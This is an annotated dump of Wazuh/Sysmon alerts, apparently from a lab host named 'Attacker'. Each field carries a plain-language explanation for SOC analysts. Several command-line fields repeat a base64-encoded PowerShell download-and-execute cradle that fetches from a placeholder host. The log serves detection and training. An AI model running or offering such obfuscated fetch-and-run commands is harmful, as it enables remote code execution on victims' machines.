data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:57.351+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:57.351+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  65
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534277.1517908
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:55.3537134Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284144
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:55.314 ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} ProcessId: 5944 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1 CreationUtcTime: 2025-04-24 22:37:55.314 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:55.314
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd42-680a-5b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5944
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:55.314
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:00.018+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:00.018+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  62
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534280.1520673
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:58.3360432Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284163
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:56.657 ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} ProcessId: 5188 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} ParentProcessId: 5944 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:56.657
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd44-680a-5d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd42-680a-5b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5944
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:01.135+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:01.135+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  66
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534281.1528736
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:58.5451085Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284164
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:58.543 ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} ProcessId: 5188 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tsd2bll.s43.ps1 CreationUtcTime: 2025-04-24 22:37:58.543 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:58.543
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd44-680a-5d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tsd2bll.s43.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:58.543
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:03.469+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:03.469+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  63
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534283.1531501
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:00.8075389Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284198
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:59.419 ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} ProcessId: 15132 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} ParentProcessId: 5188 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:59.419
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd47-680a-610b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15132
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd44-680a-5d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

